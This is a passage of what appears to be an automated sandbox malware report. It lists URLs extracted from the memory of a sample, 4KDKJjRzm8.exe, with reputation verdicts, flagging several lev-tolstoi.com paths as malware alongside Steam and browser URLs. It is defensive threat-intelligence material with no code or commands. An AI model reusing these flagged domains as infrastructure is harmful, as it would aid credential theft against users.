                                                                      https://lev-tolstoi.com/s4KDKJjRzm8.exe, 00000000.00000003.1565125707.000000000136D000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1610249625.0000000001370000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000002.1614778336.0000000001370000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1582545384.0000000001370000.00000004.00000020.00020000.00000000.sdmptrue
                                                                      • Avira URL Cloud: malware
                                                                      		unknown
                                                                      https://community.fastly.steamstatic.com/public/shared/javascript/shar4KDKJjRzm8.exe, 00000000.00000003.1466309055.000000000135D000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1466220436.000000000131E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1438106482.000000000132E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437953868.000000000132E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://store.steampowered.com/subscriber_agreement/4KDKJjRzm8.exe, 00000000.00000003.1437919303.000000000136D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://www.gstatic.cn/recaptcha/4KDKJjRzm8.exe, 00000000.00000003.1466309055.000000000135D000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1466220436.000000000131E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1438106482.000000000132E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437953868.000000000132E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://lev-tolstoi.com/pitT4KDKJjRzm8.exe, 00000000.00000003.1613301096.0000000001370000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1610249625.0000000001370000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000002.1614778336.0000000001370000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1582545384.0000000001370000.00000004.00000020.00020000.00000000.sdmptrue
                                                                            • Avira URL Cloud: malware
                                                                            		unknown
                                                                            https://lev-tolstoi.com/qo4KDKJjRzm8.exe, 00000000.00000003.1613301096.0000000001370000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1610249625.0000000001370000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000002.1614778336.0000000001370000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1582545384.0000000001370000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: malware
                                                                            		unknown
                                                                            http://www.valvesoftware.com/legal.htm4KDKJjRzm8.exe, 00000000.00000003.1437919303.000000000136D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&amp;l=en4KDKJjRzm8.exe, 00000000.00000003.1466309055.000000000135D000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1466220436.000000000131E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1438106482.000000000132E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437953868.000000000132E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437919303.000000000136D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://www.youtube.com4KDKJjRzm8.exe, 00000000.00000003.1466220436.000000000131E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1438106482.000000000132E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437953868.000000000132E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://www.google.com4KDKJjRzm8.exe, 00000000.00000003.1466220436.000000000131E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1438106482.000000000132E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437953868.000000000132E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://lev-tolstoi.com/pi44KDKJjRzm8.exe, 00000000.00000003.1543231877.000000000136F000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1542773608.000000000136D000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1565125707.000000000136D000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1610249625.0000000001370000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1582545384.0000000001370000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1539309056.0000000001360000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                    • Avira URL Cloud: malware
                                                                                    		unknown
                                                                                    https://lev-tolstoi.com/pi04KDKJjRzm8.exe, 00000000.00000003.1438106482.000000000132E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437953868.000000000132E000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                    • Avira URL Cloud: malware
                                                                                    		unknown
                                                                                    https://lev-tolstoi.com/api)4KDKJjRzm8.exe, 00000000.00000003.1539387547.000000000131E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1543528478.000000000131E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1488231577.000000000131E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1513371568.000000000132D000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                    • Avira URL Cloud: malware
                                                                                    		unknown
                                                                                    https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback4KDKJjRzm8.exe, 00000000.00000003.1437919303.000000000136D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://lev-tolstoi.com/iaj4KDKJjRzm8.exe, 00000000.00000003.1610249625.0000000001361000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1613301096.0000000001366000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000002.1614778336.0000000001366000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                      • Avira URL Cloud: malware
                                                                                      		unknown
                                                                                      https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af64KDKJjRzm8.exe, 00000000.00000003.1466309055.000000000135D000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437953868.00000000012DC000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1466220436.000000000131E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1438106482.000000000132E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437953868.000000000132E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437919303.000000000136D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/4KDKJjRzm8.exe, 00000000.00000003.1466220436.000000000131E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1438106482.000000000132E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437953868.000000000132E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696495411400900000.1&ci=1696495411208.12791&cta4KDKJjRzm8.exe, 00000000.00000003.1541193562.0000000005CB6000.00000004.00000800.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1565070208.0000000005CB6000.00000004.00000800.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1540810685.0000000005CB6000.00000004.00000800.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1542630820.0000000005CB6000.00000004.00000800.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1516290444.0000000005CB6000.00000004.00000800.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1539246157.0000000005CB6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://community.fastly.steamstatic.com/public/images/s4KDKJjRzm8.exe, 00000000.00000003.1438106482.000000000132E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437953868.000000000132E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://lev-tolstoi.com/piD4KDKJjRzm8.exe, 00000000.00000003.1488959320.0000000001360000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1488193272.000000000135F000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                              • Avira URL Cloud: malware
                                                                                              		unknown
                                                                                              https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&amp;l=engl4KDKJjRzm8.exe, 00000000.00000003.1437919303.000000000136D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&amp;l=englis4KDKJjRzm8.exe, 00000000.00000003.1466309055.000000000135D000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1466220436.000000000131E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1438106482.000000000132E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437953868.000000000132E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437919303.000000000136D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC4KDKJjRzm8.exe, 00000000.00000003.1466309055.000000000135D000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1466220436.000000000131E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1438106482.000000000132E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437953868.000000000132E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437919303.000000000136D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    https://s.ytimg.com;4KDKJjRzm8.exe, 00000000.00000003.1466309055.000000000135D000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1466220436.000000000131E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1438106482.000000000132E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437953868.000000000132E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=FRRi4KDKJjRzm8.exe, 00000000.00000003.1466309055.000000000135D000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437953868.00000000012DC000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1466220436.000000000131E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1438106482.000000000132E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437953868.000000000132E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437919303.000000000136D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=14KDKJjRzm8.exe, 00000000.00000003.1437953868.00000000012DC000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1438106482.000000000132E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437953868.000000000132E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437919303.000000000136D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&amp;l=english&4KDKJjRzm8.exe, 00000000.00000003.1466309055.000000000135D000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1466220436.000000000131E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1438106482.000000000132E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437953868.000000000132E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437919303.000000000136D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            https://community.fastly.steamstatic.com/4KDKJjRzm8.exe, 00000000.00000003.1437953868.000000000132E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1488231577.000000000131E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              https://steam.tv/4KDKJjRzm8.exe, 00000000.00000003.1438106482.000000000132E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437953868.000000000132E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&amp;l=en4KDKJjRzm8.exe, 00000000.00000003.1437919303.000000000136D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  https://lev-tolstoi.com/ARE4KDKJjRzm8.exe, 00000000.00000003.1488959320.0000000001360000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1515928263.000000000135D000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1488193272.000000000135F000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1513284186.000000000135D000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1539309056.0000000001360000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  • Avira URL Cloud: malware
                                                                                                                  		unknown
                                                                                                                  https://lev-tolstoi.com/4KDKJjRzm8.exe, 00000000.00000003.1539369110.0000000005CB9000.00000004.00000800.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1516348850.0000000005CB8000.00000004.00000800.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1610249625.0000000001370000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000002.1614778336.0000000001370000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1513284186.000000000135D000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1516290444.0000000005CB6000.00000004.00000800.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1582545384.0000000001370000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1539309056.0000000001360000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    http://store.steampowered.com/privacy_agreement/4KDKJjRzm8.exe, 00000000.00000003.1466309055.000000000135D000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437953868.00000000012DC000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1466220436.000000000131E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1438106482.000000000132E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437953868.000000000132E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437919303.000000000136D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      https://community.fastly.steamstatic.com4KDKJjRzm8.exe, 00000000.00000003.1466309055.000000000135D000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1466220436.000000000131E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1438106482.000000000132E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437953868.000000000132E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        https://store.steampowered.com/points/shop/4KDKJjRzm8.exe, 00000000.00000003.1437919303.000000000136D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=4KDKJjRzm8.exe, 00000000.00000003.1465201943.0000000005C5C000.00000004.00000800.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1465087302.0000000005C5C000.00000004.00000800.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1465001687.0000000005C5F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            http://crl.rootca1.amazontrust.com/rootca1.crl04KDKJjRzm8.exe, 00000000.00000003.1514353743.0000000005CCA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              http://ocsp.rootca1.amazontrust.com0:4KDKJjRzm8.exe, 00000000.00000003.1514353743.0000000005CCA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&amp;l=english&a4KDKJjRzm8.exe, 00000000.00000003.1466309055.000000000135D000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1466220436.000000000131E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1438106482.000000000132E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437953868.000000000132E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437919303.000000000136D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  https://sketchfab.com4KDKJjRzm8.exe, 00000000.00000003.1466220436.000000000131E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1438106482.000000000132E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437953868.000000000132E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    https://www.ecosia.org/newtab/4KDKJjRzm8.exe, 00000000.00000003.1465201943.0000000005C5C000.00000004.00000800.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1465087302.0000000005C5C000.00000004.00000800.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1465001687.0000000005C5F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      https://lv.queniujq.cn4KDKJjRzm8.exe, 00000000.00000003.1438106482.000000000132E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437953868.000000000132E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        https://steamcommunity.com/profiles/76561199724331900/inventory/4KDKJjRzm8.exe, 00000000.00000003.1437919303.000000000136D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br4KDKJjRzm8.exe, 00000000.00000003.1515973644.0000000005D46000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            https://www.youtube.com/4KDKJjRzm8.exe, 00000000.00000003.1466309055.000000000135D000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1466220436.000000000131E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1438106482.000000000132E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437953868.000000000132E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696495411400900000.2&ci=1696495411208.4KDKJjRzm8.exe, 00000000.00000003.1516348850.0000000005CB8000.00000004.00000800.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1516290444.0000000005CB6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                              		unknown
                                                                                                                                              https://store.steampowered.com/privacy_agreement/4KDKJjRzm8.exe, 00000000.00000003.1437919303.000000000136D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&amp;l=eng4KDKJjRzm8.exe, 00000000.00000003.1466309055.000000000135D000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1466220436.000000000131E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1438106482.000000000132E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437953868.000000000132E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437919303.000000000136D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  https://steamcommunity.com/profiles/76561199724331900/i4KDKJjRzm8.exe, 00000000.00000003.1466309055.000000000135D000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1466220436.000000000131E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1438106482.000000000132E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437953868.000000000132E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    		high
                                                                                                                                                    https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&a4KDKJjRzm8.exe, 00000000.00000003.1466309055.000000000135D000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1466220436.000000000131E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1438106482.000000000132E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437953868.000000000132E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      		high
                                                                                                                                                      https://lev-tolstoi.com//Passw4KDKJjRzm8.exe, 00000000.00000003.1539309056.0000000001360000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      • Avira URL Cloud: malware
                                                                                                                                                      		unknown
                                                                                                                                                      https://lev-tolstoi.com/stT4KDKJjRzm8.exe, 00000000.00000003.1565125707.000000000136D000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                                                      • Avira URL Cloud: malware
                                                                                                                                                      		unknown
                                                                                                                                                      https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&amp;l=english&am4KDKJjRzm8.exe, 00000000.00000003.1466309055.000000000135D000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1466220436.000000000131E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1438106482.000000000132E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437953868.000000000132E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437919303.000000000136D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        		high
                                                                                                                                                        https://www.google.com/recaptcha/4KDKJjRzm8.exe, 00000000.00000003.1437953868.000000000132E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          		high
                                                                                                                                                          https://checkout.steampowered.com/4KDKJjRzm8.exe, 00000000.00000003.1437953868.000000000132E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            		high
                                                                                                                                                            https://steamcommunity.com/profiles/765614KDKJjRzm8.exe, 00000000.00000003.1466309055.000000000135D000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1466220436.000000000131E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              		high
                                                                                                                                                              https://avatars.fastly.steamstati4KDKJjRzm8.exe, 00000000.00000003.1466309055.000000000135D000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1488959320.0000000001360000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1515928263.000000000135D000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1466220436.000000000131E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1438106482.000000000132E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1488193272.000000000135F000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437953868.000000000132E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1565220310.0000000001360000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1513284186.000000000135D000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1539309056.0000000001360000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                              		unknown
                                                                                                                                                              https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg4KDKJjRzm8.exe, 00000000.00000003.1516348850.0000000005CB8000.00000004.00000800.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1516290444.0000000005CB6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                		high
                                                                                                                                                                https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqd4plX4pbW1CbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi4KDKJjRzm8.exe, 00000000.00000003.1516290444.0000000005CB6000.00000004.00000800.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1539246157.0000000005CB6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                  		high
                                                                                                                                                                  https://lev-tolstoi.com/te4KDKJjRzm8.exe, 00000000.00000003.1565125707.000000000136D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  • Avira URL Cloud: malware
                                                                                                                                                                  		unknown
                                                                                                                                                                  https://lev-tolstoi.com/ients/4KDKJjRzm8.exe, 00000000.00000003.1515928263.000000000135D000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1513284186.000000000135D000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1539309056.0000000001360000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  • Avira URL Cloud: malware
                                                                                                                                                                  		unknown
                                                                                                                                                                  https://community.fastly.steamstatic.com/public/css/globalv2.F4KDKJjRzm8.exe, 00000000.00000003.1466309055.000000000135D000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1466220436.000000000131E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1438106482.000000000132E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437953868.000000000132E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    		high
                                                                                                                                                                    https://store.steampowered.com/about/4KDKJjRzm8.exe, 00000000.00000003.1437919303.000000000136D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      		high
                                                                                                                                                                      https://steamcommunity.com/my/wishlist/4KDKJjRzm8.exe, 00000000.00000003.1437919303.000000000136D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        		high
